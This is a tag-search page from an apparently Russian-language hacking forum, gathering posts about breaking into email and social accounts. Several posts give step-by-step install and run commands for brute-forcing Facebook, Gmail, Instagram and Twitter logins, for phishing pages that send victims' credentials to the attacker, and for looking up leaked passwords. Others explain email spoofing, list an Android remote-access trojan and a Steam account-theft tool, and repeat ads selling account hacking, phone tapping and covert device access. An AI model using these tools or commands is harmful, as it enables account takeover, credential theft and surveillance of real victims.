Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом почты'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 23 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как проверить рабочая ли почта. KnockMail — утилита, которая проверяет почту на валид, т.е на факт ее существования. Инструмент особенно полезен для тех, кто работает с базами данных и для тех, кто создает атаки. Установка: $ pkg update $ pkg upgrade $ pkg instal tsu $ pkg install python $ pkg intall git $ pkg install python2 $ git clone https://github.com/4w4k3/KnockMail.git $ cd KnockMail $ tsu $ pip install -r requeriments.txt Запуск: $ python knock.py После запуска нас встречает меню, в котором мы можем выбрать проверку e-mail адресов в специальном файле (цифра 1) или проверку одного e-mail (цифра 2). Очень полезная программа, что проверять почту на валид. Она может пригодиться для спама или во время получения большого количество почт в разные ваши проекты. Часто легче купить набор с почтами и чтобы проверить все ли они рабочие – эта программа эффективный и быстрый метод. Поэтому если вам дорого ваше время, то рекомендую к использованию каждому пользователю. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье хочу рассказать вам о том, как за 5 минут создать тысячи аккаунтов Gmail. Для массовой регистрации аккаунтов нужны «чистые» почтовые ящики. Да, весь процесс создания нового электронного адреса занимает 5 минут. Но в XXI веке 5 минут — это очень много! И, да, есть сервисы временной почты. Вот только не любой сайт принимает адрес со специфичным доменом. Решение: использовать уязвимость Gmail! Что за фича? Большинство сервисов не воспринимает точку как уникальный символ. Расшифруем: для сайтов нет разницы между oblakosxem@gmail.com и oblako.sxem@gmail.com. Адреса разные, но если мы отправим сообщение на второй, оно будет переадресовано на первый! Что получается? Можно использовать один почтовый ящик несколько раз! И расставлять точки — не мешки ворочать. Но даже это можно делегировать. Gmail Dot Trick Generator. Один клик, и сотня уникальных адресов в твоём распоряжении! Рекомендуется использовать в email как можно больше символов: так количество псевдопочт будет выше. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры, в данной статье я хочу познакомить вас с одной утилитой Termux, которая называется - h8mail. Чем же она хороша? Она прогонят нужную вам почту по своим базам и выдает некоторое кол-во паролей, с ее помощью можно получить доступ не только к почтовому ящику, а вообще ко всем аккаунтам, если пользователь использует при этом одни и те же пароли. Допустим, пользователь зарегистрировался на сайте www.adobe,com. Через время в сеть утекла ее БД, а значит пароль пользователя в открытом доступе. H8mail собирает все слитые базы и дает вам к ним своеобразный доступ. Инструкция: Устанавливаем Termux и прописываем команды в консоль: update -y & pkg upgrade -y pkg install git python pip install requests pip install h8mail Теперь вписываем нужный нам email: h8mail -t почта За минуту утилита прогонит почту по своим базам и если она где-то засветилась в слитых базах данных, то вы получите положительный результат. Вы получите правильный пароль от почты и сможете в нее войти, а возможно сможете получить доступ к различным аккаунтам на базе этой почты. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую хакеры, в данной статье я хочу рассказать про утилиту, благодаря которой можно взламывать различные социальные сети методом брутфорса Немного о самой утилите: SocialBox - это фреймворк для атаки грубой силой таких соцсетей, как Facebook, Gmail, Instagram, Twitter Переходим к установке самой утилиты Обновляем пакеты: apt-get update Устанавливаем гит: apt-get install git Качаем ссылку с репозиторием с GitHub: git clone https://github.com/samsesh/SocialBox-Termux.git Переходим в эту директорию: cd SocialBox-Termux Делаем файлы исполняемыми: chmod +x SocialBox.sh chmod +x install-sb.sh И наконец запуск: ./install-sb.sh ./SocialBox.sh Далее, если вы сделали все правильно перед вами будет вот такая картинка: Теперь выбираем какую социальную сеть хотим взломать Вот список что там есть: 1 - Facebook 2 - Gmail account 3 - Instagram 4 - Twitter 99 - Exit ( выход ) После выбора соцсети пишем название аккаунта, которого хотим взломать и выбираем словарь, если у вас нету словаря можно использовать стандартный, клавишей "Enter". Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци
  5. PhotoSploit — утилита, с помощью которой злоумышленник может украсть авторизационные данные пользователя Google или Facebook. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: sudo apt-get update && apt-get upgrade Далее клонируем репозиторий с помощью команды: git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git Переходим в директорию: cd FotoSploit Делаем скрипты исполняемыми: chmod +x install.sh chmod +x ./FotoSploit Устанавливаем все необходимые компоненты: bash install.sh И запускаем инструмент: ./FotoSploit Для работы потребуется фотография в формате .jpg с размером не более 430х430, которую нужно скопировать в директорию с инструментом. В терминале инструмента устанавливаем нашу фотографию: set foto Задаем заголовок страницы: set title url И задаем название сервиса (Google или Facebook), на который будет перенаправлена наша жертва: set title url или Facebook> Теперь запускаем генерацию страницы: run После этого инструмент выведет ссылку на сгенерированную страницу, по которой должна перейти наша жертва. Когда жертва перейдет по нашей ссылке, у нее появится специальная заставка, которая потребует авторизацию с помощью логина и пароля. Пока жертва залипает на нашей странице, инструмент отправит нам информацию об геолокации, IP-адресе, DNS, версии ОС и так далее. Если жертва введет логин и пароль в графу авторизации, то на атакующий хост придут все авторизационные данные. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Доброго времени суток, хакер. Анонимный прием и отправка почты мы уже изучили, осталось зашифровать и всё будет хорошо. GPG - позволяет шифровать любые данные, в том числе и почтовые сообщения. Подробнее работа GPG в статье "Шифрование данных". Enigmail - дополнение для почтового клиента Thunderbird и набора приложений SeaMonkey, предоставляющее удобный интерфейс для работы с GPG в почтовых сообщениях. Сайт: http://enigmail.net S/MIME S/MIME (Secure/Multipurpose Internet Mail Extensions) - стандарт подписи и шифрования электронной почты. Получение бесплатного сертификата Бесплатно сертификат можно получиьт у следющих центров сертификации: 1. https://secure.comodo.com/products/frontpage?area=SecureEmailCertificate 2. https://www.cacert.org/index.php?id=1 (корневой сертификат присутствует не везде) Создание самоподписанного сертификата Для этого нам понадобится OpenSSL https://openssl.org openssl genrsa −des3 −o u t s e r v e r . key 1024 openssl req −new −key s e r v e r . key −o u t s e r v e r . c s r openssl x509 −req −days 365 −i n s e r v e r . c s r −s i g n k e y s e r v e r . key −o u t server . c r t Использование Для использования импортируйте ключ в ваш портовый клиент. Сохраните ключи в безопасности.
  7. Как правило, большинство атак начинается именно с поддельного адреса в строке “от”. Но какая проблема в том, чтобы создать похожий поддельный домен и с него отправлять необходимые письма? Или, например, создать домен с произвольным названием и присвоить ему дружеское имя, которое будет выглядеть как имя ген. директора компании? Потому что отправить поддельное письмо от именно необходимого домена намного проще, даже чем присваивать новому почтовому ящику дружественное имя. Три легких метода В интернете запросто можно найти сайты, которые позволяют отправлять поддельные письма. И их множество, например: spoofbox.com или anonymailer.net. Многие подобные сервисы бесплатны, некоторые же требуют оплату. Себя сервисы позиционируют как законные, предназначены они для розыгрыша друзей. Пользоваться ими очень легко. Нужно в поле “Кому:” написать адрес получателя и в поле “От:” вписать любой желаемый адрес, после чего отправить сообщение. Соглашаясь с пользовательским соглашением, вы берете на себя ответственность за любой ущерб, который можете принести. Второй способы отправить поддельное письмо – использовать команду строку на Linux. Если на вашем компьютере эта ОС и на нем настроена почтовая служба, то достаточно написать эту команду: Mail -aFrom:test@test.ru Введя ее, создастся сообщение, где в поле “От:” будет написано “test@test.ru”. После этого вводим тему, необходимый тест и нажимаем Ctrl + D и ваше сообщение будет отправлено. Работает это в зависимости от настройки почтовой системы. Однако, работает оно практически всегда. Следующий метод – использование PHP, для создания письма из нескольких строк кода. Вот он: <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $headers = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail($to, $subject, $message, $headers); ?> По факту это код, который используется в функции отправки письма. Безусловно, это примитивные способы подделки сообщения и их можно совершенствовать имея необходимые навыки. Но все необходимое осваивается за пару минут.
  8. Профессиональные услуги хакера от LarionovHack@gmail.com 1. Взлом мессенджеров сообщений: 1.1 Взлом WhatsApp 1.2 Взлом Viber 1.3 Взлом Telegram (только архив сообщений) 2. Взлом социальных сетей: 2.1 Взлом ВКонтакте 2.2 Взлом Instagram 2.3 Взлом Одноклассники 2.4 Взлом Facebook 3. Взлом базы данных сайтов: 3.1 Слив базы данных сайта 3.2 Удаленный доступ к панели сайта 3.3 Удаление негативной информации: поисковые системы, отзывы, форумы, блоги, базы данных - очистим все, что мешает в интернете Заказы принимаются на почту: larionovhack@gmail.com Телеграм для связи: @LarionovHack 4. Взлом любых видов почт (зарубежных, корпоративных и т.д): 4.1 Взлом mail.ru (bk.ru, list.ru, inbox.ru), yandex.ru, rambler.ru и др. 4.2 Взлом gmail.com, yahoo.com, hotmail.com, live.com и др. 4.3 Взлом корпоративных почты (обсуждаются в индивидуальном порядке) Если Вы не нашли необходимую вам услугу в нашем объявлении, то пишите на почту, мы сможем Вам помочь. Контактный адрес: larionovhack@gmail.com Telegram: @LarionovHack 5. Дополнительные услуги: 5.1 Работа с номерами (прослушка телефонов, отслеживание смс в реальном времени) 5.2 Удаленный доступ к ПК, телефону на базе Android/iOS/Windows 5.3 Взлом Skype для любой страны 5.4 Возможна полная очистка БКИ (банковская кредитная история), повышение скорингового балла Смело можете обращаться с вопросом любой сложности из любой плоскости не вникая в весь профессиональный сленг данной сферы, мы найдем комплексное решение для Вашего дела и объясним всё простым языком. Часто может возникнуть необходимость в сжатые сроки получить доступ к аккаунту в соц сетях или почте, зарегистрированному на любом ресурсе и не важно, чужой он или свой. Достичь данной цели можно исключительно посредством взлома. Заказав взлом у нас, вы не только сэкономите время и деньги, но еще и получите приятный бонус. Наши преимущества: 1. Предоставляется гарантия на доступ в течение 30 дней. 2. Без предоплаты, доказательства на усмотрение заказчика, работа через уважаемый в сети гарант-сервис. 3. Логин и пароль не меняются, уведомления обходятся, жертва ни о чем не узнает. 4. Стараемся выполнять все заказы в срок, без задержек по времени. 5. Заказы принимаем 24/7, вы можете обратиться к нам в любое время и наши операторы обработают ваш заказ. ОБРАЩАТЬСЯ НА ПОЧТУ: larionovhack@gmail.com СВЯЗЬ ЧЕРЕЗ ТЕЛЕГРАМ: @LarionovHack
  9. FastHackTeam@gmail.com - решение проблем по взлому любой сложности Легендарный сервис по взлому от команды хакеров FastHackTeam возвращается. На этот раз мы значительно увеличили спектр услуг, а также сделали цены на услуги самыми минимальными на рынке. 1. Взлом мессенджеров сообщений: 1.1 Взлом WhatsApp 1.2 Взлом Viber 1.3 Взлом Telegram 2. Взлом социальных сетей: 2.1 Взлом ВКонтакте 2.2 Взлом Instagram 2.3 Взлом Одноклассники 2.4 Взлом Facebook Все заказы принимаются на почту: fasthackteam@gmail.com 3. Взлом любых видов почт (зарубежных, корпоративных и т.д): 3.1 Взлом mail.ru (bk.ru, list.ru, inbox.ru), yandex.ru, rambler.ru и др. 3.2 Взлом gmail.com, yahoo.com, hotmail.com, live.com и др. 3.3 Взлом корпоративных почты (обсуждаются в индивидуальном порядке) Если Вы не нашли необходимую вам услугу в нашем объявлении, то пишите на почту, мы сможем Вам помочь. Смело можете обращаться с вопросом любой сложности из любой плоскости не вникая в весь профессиональный сленг данной сферы, мы найдем комплексное решение для Вашего дела и объясним всё простым языком. Контактный адрес: fasthackteam@gmail.com 4. Дополнительные услуги: 4.1 Удаление негативной информации: поисковые системы, отзывы, форумы, блоги, базы данных - очистим все, что мешает в интернете 4.2 Взлом сайтов и web-проектов любой сложности и тематики 4.3 Работа с номерами (прослушка телефонов, отслеживание смс в реальном времени) 4.4 Удаленный доступ к ПК, телефону на базе Android/iOS/Windows 4.5 Взлом Skype для любой страны 4.6 Возможна полная очистка БКИ (банковская кредитная история), повышение скорингового балла FastHackTeam - это команда состоящая исключительно из профессионалов своего дела, готовая к выполнению задач любой сложности. За более чем 7 лет в данной сфере мы ничуть не потеряли интерес к своему делу, каждый день стремясь найти новые решения - мы можем предложить уникальные услуги которым нет аналогов в сети. Наши преимущества: 1. Предоставляется гарантия на доступ в течение 30 дней. 2. Без предоплаты, доказательства на усмотрение заказчика, работа через уважаемый в сети гарант-сервис. 3. Логин и пароль не меняются, уведомления обходятся, жертва ни о чем не узнает. 4. Выполняем все заказы в срок, без задержек по времени. 5. Заказы принимаем 24/7, вы можете обратиться к нам в любое время и наши операторы обработают ваш заказ. ОБРАЩАТЬСЯ НА ПОЧТУ: fasthackteam@gmail.com
  10. FastHackTeam@gmail.com - решение проблем по взлому любой сложности Легендарный сервис по взлому от команды хакеров FastHackTeam возвращается. На этот раз мы значительно увеличили спектр услуг, а также сделали цены на услуги самыми минимальными на рынке. 1. Взлом мессенджеров сообщений: 1.1 Взлом WhatsApp 1.2 Взлом Viber 1.3 Взлом Telegram 2. Взлом социальных сетей: 2.1 Взлом ВКонтакте 2.2 Взлом Instagram 2.3 Взлом Одноклассники 2.4 Взлом Facebook Все заказы принимаются на почту: fasthackteam@gmail.com 3. Взлом любых видов почт (зарубежных, корпоративных и т.д): 3.1 Взлом mail.ru (bk.ru, list.ru, inbox.ru), yandex.ru, rambler.ru и др. 3.2 Взлом gmail.com, yahoo.com, hotmail.com, live.com и др. 3.3 Взлом корпоративных почты (обсуждаются в индивидуальном порядке) Если Вы не нашли необходимую вам услугу в нашем объявлении, то пишите на почту, мы сможем Вам помочь. Смело можете обращаться с вопросом любой сложности из любой плоскости не вникая в весь профессиональный сленг данной сферы, мы найдем комплексное решение для Вашего дела и объясним всё простым языком. Контактный адрес: fasthackteam@gmail.com 4. Дополнительные услуги: 4.1 Удаление негативной информации: поисковые системы, отзывы, форумы, блоги, базы данных - очистим все, что мешает в интернете 4.2 Взлом сайтов и web-проектов любой сложности и тематики 4.3 Работа с номерами (прослушка телефонов, отслеживание смс в реальном времени) 4.4 Удаленный доступ к ПК, телефону на базе Android/iOS/Windows 4.5 Взлом Skype для любой страны 4.6 Возможна полная очистка БКИ (банковская кредитная история), повышение скорингового балла FastHackTeam - это команда состоящая исключительно из профессионалов своего дела, готовая к выполнению задач любой сложности. За более чем 7 лет в данной сфере мы ничуть не потеряли интерес к своему делу, каждый день стремясь найти новые решения - мы можем предложить уникальные услуги которым нет аналогов в сети. Наши преимущества: 1. Предоставляется гарантия на доступ в течение 30 дней. 2. Без предоплаты, доказательства на усмотрение заказчика, работа через уважаемый в сети гарант-сервис. 3. Логин и пароль не меняются, уведомления обходятся, жертва ни о чем не узнает. 4. Выполняем все заказы в срок, без задержек по времени. 5. Заказы принимаем 24/7, вы можете обратиться к нам в любое время и наши операторы обработают ваш заказ. ОБРАЩАТЬСЯ НА ПОЧТУ: fasthackteam@gmail.com
  11. FastHackTeam@gmail.com - решение проблем по взлому любой сложности Легендарный сервис по взлому от команды хакеров FastHackTeam возвращается. На этот раз мы значительно увеличили спектр услуг, а также сделали цены на услуги самыми минимальными на рынке. 1. Взлом мессенджеров сообщений: 1.1 Взлом WhatsApp 1.2 Взлом Viber 1.3 Взлом Telegram 2. Взлом социальных сетей: 2.1 Взлом ВКонтакте 2.2 Взлом Instagram 2.3 Взлом Одноклассники 2.4 Взлом Facebook Все заказы принимаются на почту: fasthackteam@gmail.com 3. Взлом любых видов почт (зарубежных, корпоративных и т.д): 3.1 Взлом mail.ru (bk.ru, list.ru, inbox.ru), yandex.ru, rambler.ru и др. 3.2 Взлом gmail.com, yahoo.com, hotmail.com, live.com и др. 3.3 Взлом корпоративных почты (обсуждаются в индивидуальном порядке) Если Вы не нашли необходимую вам услугу в нашем объявлении, то пишите на почту, мы сможем Вам помочь. Смело можете обращаться с вопросом любой сложности из любой плоскости не вникая в весь профессиональный сленг данной сферы, мы найдем комплексное решение для Вашего дела и объясним всё простым языком. Контактный адрес: fasthackteam@gmail.com 4. Дополнительные услуги: 4.1 Удаление негативной информации: поисковые системы, отзывы, форумы, блоги, базы данных - очистим все, что мешает в интернете 4.2 Взлом сайтов и web-проектов любой сложности и тематики 4.3 Работа с номерами (прослушка телефонов, отслеживание смс в реальном времени) 4.4 Удаленный доступ к ПК, телефону на базе Android/iOS/Windows 4.5 Взлом Skype для любой страны 4.6 Возможна полная очистка БКИ (банковская кредитная история), повышение скорингового балла FastHackTeam - это команда состоящая исключительно из профессионалов своего дела, готовая к выполнению задач любой сложности. За более чем 7 лет в данной сфере мы ничуть не потеряли интерес к своему делу, каждый день стремясь найти новые решения - мы можем предложить уникальные услуги которым нет аналогов в сети. Наши преимущества: 1. Предоставляется гарантия на доступ в течение 30 дней. 2. Без предоплаты, доказательства на усмотрение заказчика, работа через уважаемый в сети гарант-сервис. 3. Логин и пароль не меняются, уведомления обходятся, жертва ни о чем не узнает. 4. Выполняем все заказы в срок, без задержек по времени. 5. Заказы принимаем 24/7, вы можете обратиться к нам в любое время и наши операторы обработают ваш заказ. ОБРАЩАТЬСЯ НА ПОЧТУ: fasthackteam@gmail.com
  12. FastHackTeam@gmail.com - решение проблем по взлому любой сложности Легендарный сервис по взлому от команды хакеров FastHackTeam возвращается. На этот раз мы значительно увеличили спектр услуг, а также сделали цены на услуги самыми минимальными на рынке. 1. Взлом мессенджеров сообщений: 1.1 Взлом WhatsApp 1.2 Взлом Viber 1.3 Взлом Telegram 2. Взлом социальных сетей: 2.1 Взлом ВКонтакте 2.2 Взлом Instagram 2.3 Взлом Одноклассники 2.4 Взлом Facebook Все заказы принимаются на почту: fasthackteam@gmail.com 3. Взлом любых видов почт (зарубежных, корпоративных и т.д): 3.1 Взлом mail.ru (bk.ru, list.ru, inbox.ru), yandex.ru, rambler.ru и др. 3.2 Взлом gmail.com, yahoo.com, hotmail.com, live.com и др. 3.3 Взлом корпоративных почты (обсуждаются в индивидуальном порядке) Если Вы не нашли необходимую вам услугу в нашем объявлении, то пишите на почту, мы сможем Вам помочь. Смело можете обращаться с вопросом любой сложности из любой плоскости не вникая в весь профессиональный сленг данной сферы, мы найдем комплексное решение для Вашего дела и объясним всё простым языком. Контактный адрес: fasthackteam@gmail.com 4. Дополнительные услуги: 4.1 Удаление негативной информации: поисковые системы, отзывы, форумы, блоги, базы данных - очистим все, что мешает в интернете 4.2 Взлом сайтов и web-проектов любой сложности и тематики 4.3 Работа с номерами (прослушка телефонов, отслеживание смс в реальном времени) 4.4 Удаленный доступ к ПК, телефону на базе Android/iOS/Windows 4.5 Взлом Skype для любой страны 4.6 Возможна полная очистка БКИ (банковская кредитная история), повышение скорингового балла FastHackTeam - это команда состоящая исключительно из профессионалов своего дела, готовая к выполнению задач любой сложности. За более чем 7 лет в данной сфере мы ничуть не потеряли интерес к своему делу, каждый день стремясь найти новые решения - мы можем предложить уникальные услуги которым нет аналогов в сети. Наши преимущества: 1. Предоставляется гарантия на доступ в течение 30 дней. 2. Без предоплаты, доказательства на усмотрение заказчика, работа через уважаемый в сети гарант-сервис. 3. Логин и пароль не меняются, уведомления обходятся, жертва ни о чем не узнает. 4. Выполняем все заказы в срок, без задержек по времени. 5. Заказы принимаем 24/7, вы можете обратиться к нам в любое время и наши операторы обработают ваш заказ. ОБРАЩАТЬСЯ НА ПОЧТУ: fasthackteam@gmail.com
  13. В век информационных технологий мошенники избирают все более изощренные способы обмана. В последние годы самым «популярным» видом денежного мошенничества стало воровство денег с банковских счетов физических лиц. Наивно полагать, что данные карты могу быть украдены только у людей, которые абсолютно не заботятся о своей безопастности и расплачиваются на подозрительных сайтах или отправляют фотографии своей карты в соцсети. Ведь один из самых популярных видов кражи данных с карты - скримминг. Суть этого метода заключается в установке мошенниками дополнительного считывающего устройства на банкомат, которое прочитает всю информацию с карточки и передаст её мошенникам. Помимо этого, устанавливается камера, которая запишет на видео процесс ввода секретного пароля от карты. Иногда вместо камеры используется накладное считывающие устройство на клавиатуру. Независимо от того, какие технологии используют мошенники, понять с первого взгляда, что банкомат был модифицирован бывает очень трудно. Банки знают о таком виде мошенничества и борятся с ним, но хакеры придумывают новые изощрённые методы скримминга, что позволяет им продолжать успешно похищать данные с карт. В чем опасность? Опасность в том что при проводке вашей карты в скимминговое устройство, злоумышленник получает дамп(клон) вашей карты. Далее с этим дампом можно закатать информацию на болванку и пойти в банкомат и украсть все ваши деньги. Насколько знаем в СНГ страхование в этой сфере работает слабенько, в целом нужно страховать карты у банков. Ежедневно крадут сотни тысяч долларов, мало кто возвращает свои деньги обратно. Поехали отдыхать за границу и подключаетесь к местному Free Wi-fi? Сейчас мы поговорим об отдыхе за границей в порядочных отелях. Кто-то едет отдыхать, а кто-то работать. Так же старайтесь не оплачивать счета картой через терминалы. Суть этих мер предосторожности? Когда все едут отдыхать в дорогие отели выплеснуть весь негатив и забыть о проблемах, которые находятся по ту сторону отдыха. Каждый человек начинает расслабляться и теряет бдительность за безопасностью своих электронных счетов, а не которые и даже за своим карманом. А кардеры приезжают в отель, чтобы заработать. В конечном итоге они взламывают местные Wi-fi сети и перехватывают пакеты в сети интернет (Ваш трафик). То есть идет перехват всех данных передаваемых в данной сети. От вводимых адресов, до логинов и паролей, а так же номера карт и остальная информация при оплатах данного человека, каких либо заказов в номер через веб интерфейс ресторана. Таким образом могут перехватить не только банковские данные, а много вашей личной информации. Как видно, перехват данных идет у пользователей через интернет, но платежи совершают не так часто, через веб интерфейс, как оплачивают картой через терминал. Сейчас очень распространена торговля удаленными серверами, то есть компьютерами которые всегда в сети (они занимаются обслуживанием, в данном случае отеля) Через данные компьютеры подключенные к сети и их маршрутизаторов и совершаются платежи через терминал, вся информация о платеже летит с терминала к компьютеру банка. Взломав данный сервер отеля, его заражают вирусом, который перехватывает и сохраняет данные платежей летящих в банки. Даже не находившись в сети данного отеля, а владея доступом к серверу который ведет обслуживание, происходит кража карт, причем в большем количестве, так как платежей проходит намного больше. Подытожим. Снимайте деньги в банкоматах, оплачивайте сервис отеля наличными. Не пользуйтесь публичными WI-FI сетями – или всегда используйте vpn туннелированное подключение, для шифровки передаваемых и получаемых вами данных.
  14. 1.Взлом ftp сервера Anonymous FTP Finder - программа для поиска уязвимых ftp серверов с последующим проникновением. 2.Dendroid Android Http Remote Administration Tool Full Source Dendroid Android программа - удаленного администрирования устройств на операционной системе Android Функционал: Просмотр файлов ; Просмотр контактов ; Просмотр журнал звонков ; Демонстрация экрана ; Управления SMS- сообщениями ; + Есть возможность записывать видео и делать фото с фронтальной и тыловой камеры ; + Скрытая запись разговоров на телефоне Android ; + Можете Отправить SMS ; + Полное управление ; 3.Ez Steam Cracked Функционал: 1. Взаимодействие с сервисом временной почты. 2. Возможность перепривязать на свою почту/саморег. 3. Поддержка mail.ru, yandex.ru, rambler.ru. 4. Выдача кода на восстановление пароля, кода SteamGuard, кода для смены почты. 5. Установка фильтров (только Mail.Ru). 6. Установка пароля на Входящие (только Mail.Ru). 7. Удаление писем стима/всех писем (инода бывают баги, на 100% работает только на Mail.Ru). 8. Копирование при клике на поле. 9. Поддержка логов стим софтов от Aniel/Lagger/Amfi/Jlegioh/deival909/FineC0de, а так же логов вида "email:pass | login" и "email:pass | login | steamUrl". 10. Загрузка файлов методом Drag'n'Drop. 11. Поиск всех логинов, привязанных к почте. 4.Change MAC Address. программа для смена mac адреса 5.Hack Tool Функционал: 1. Icon Changer ; 2. Extenson Spoofer ; 3. File Pumper ; 4. IP Tracer ; 5. Host 2IP ;
  15. За последние 10 лет хакеры взломали почти пять миллиардов аккаунтов в соцсетях со всего мира. Данные опубликовал разработчик безопасности Microsoft Трой Хант, и ежедневно он обновляет эту статистику. Зачастую пользователь сам выдает киберпреступнику все данные и даже не догадывается об этом. Есть ли этика у хакеров, зачем в соцсетях лучше молчать и почему "взломать" человека намного проще, чем компьютер, — мы узнали у хакера с 20-летним стажем, который дал интервью на условиях анонимности. Про этику и черных взломщиков Мне не нравится, когда меня называют хакером, потому что это слово несет такой же искусственно сформированный негативный оттенок, как слово "пират". А к нему относят всех — от нарушителей авторских прав, зарабатывающих деньги, до матерей-одиночек, скачивающих обучающие уроки. Сегодня "светлых" хакеров (помогающих искать разработчикам слабые места в программах. — Прим. ред.) больше, чем "черных". Это сложнее, нужна большая квалификация. Да и среди "темных" кибервзломщиков не всех назовешь преступниками. У каждого свой мотив: желание заработать, спортивный интерес или высокие цели. Можно открыть данные, которые, по мнению человека, должны быть обязательно преданы огласке, выложить переписку на WikiLeaks — это не плохо. Если хакер использовал информацию для личного обогащения, отношение к нему у меня негативное. Я скорее этичный хакер. Мне бы хотелось реанимировать RuLeaks — это русскоязычный аналог WikiLeaks. Настоящие профи хакерства — юные 18-летние парни. Они не гонятся за наживой, с детства за компьютером, работают быстрее многих правительственных специалистов. Им нечего терять, у них нет психологических ограничений. Про "собственную шкуру" Благодаря фильмам мы представляем кибервзломщика так: социально неадаптированный человек в капюшоне, с длинными волосами и бородой. Я же с виду не отличаюсь от обычного "офисного планктона". Моя официальная работа не связана с IT. Никогда не занимаюсь хакерством дома — в офисе это делать безопаснее. Домашний интернет я оформляю у провайдера по своим паспортным данным, а компания, где я работаю, все оформляет на себя. Дома я сам открою дверь полиции, которая изымет мое оборудование, а в компании у меня есть время замести следы. Дома я подвергаю опасности всю семью, в компании — только себя. Родные не в курсе моего "хобби". Заказы я беру только через Даркнет, никаких личных встреч или переписок. Про первый опыт — как первый поцелуй Первые знания об IT я получил из книг "Классика Сomputer Science" и журнала "Хакер". Потом появились онлайн-курсы Coursera, курсы американских университетов и "Академии Хана". В школе информатику практически не преподавали. Я рад за современных подростков и завидую — они застали эпоху открытого интернета с неограниченным ресурсом информации. Но мы видим, что эта эпоха заканчивается, глобальную сеть все больше хотят загнать в рамки. До появления безлимитного интернета люди подключались к провайдерам с локальной сетью и файлообменником. Многие пользователи по незнанию открывали доступ к личным папкам, и этим было грех не воспользоваться. Я удаленно подключался к компьютеру человека, открывал "Блокнот" на его рабочем столе и начинал писать инструкцию — "как обезопасить себя от взлома". Человек, может, и был возмущен такой наглостью, но потом мне спасибо говорил. Поэтому мой первый хакерский опыт был весьма этичным. Когда интернет стал доступным, миллионы, в основном подростки, поняли, как круто было бы знать секреты друзей и возлюбленных. Предложения "взломай страничку Светы" мне присылали десятки раз каждый день. За взлом по тем временам давали хорошие деньги. Я этим пользовался. Прошли годы, а такие просьбы до сих пор поступают, но уже от людей 40-50 лет. Не берусь — не интересно. Про человеческую наивность О первом серьезном заказе я не хочу подробно рассказывать из соображений безопасности. Если коротко, то нужно было достать базу данных сотрудников одной компании. Бизнесмены так собирают компромат друг на друга, чтоб
  16. http://rwf-img.iheart.com/2135/2016/01/default/hacker_0_1453455870.jpg Взлом почты, аккаунтов в социальных сетях и различных паролей – дело, конечно, не очень хорошее и незаконое. Однако в некоторых случаях эти действия вполне оправданы, и причина для этого у каждого своя. Если вам нужно узнать какую-либо запаролированную информацию, то лучше всего заказать услуги по взлому паролей. Самостоятельно используя программы делать это лучше не стоит. Они, конечно, дешевле, но в большинстве в них есть вирусы, которые способны принести проблемы. На нашем форуме вы можете найти услуги взлома хакером. Сегодня существует множество способов, поэтому заказать услуги взлома легко и просто. Доверять такое дело лучше всего профессионалам, которые полностью разбираются во всех нюансах. А вот непосвященный пользователь может запросто оставить свой след. Все это может привести к серьезным проблемам. К тому же, очень сложно разобраться в способах взлома. На нашем форуме представлены услуги по взлому: • аккаунта и паролей; • почты и сайта; • инстаграма и одноклассников; • страниц ВК и так далее. Особенно востребованы услуги взлома соц сетей. Наш форум самое подходящее место для поиска и предложения услуг в данной области. Здесь заказчик может при заказе услуг взлома ВКонтаке почитать реальные отзывы об исполнителе. Если исполнитель работает хорошо, то у него будет высокий уровень репутации и рейтинг. Услуги по взлому страниц широко распространены, поэтому важно уделять внимание правильному выбору исполнителя. Реальные отзывы обычно написаны простым языком и даже с ошибками, ведь при обычном общении мало кто заботится о правильном написании сообщений. Заказывая услуги по взлому ВК, не забывайте, что вы можете 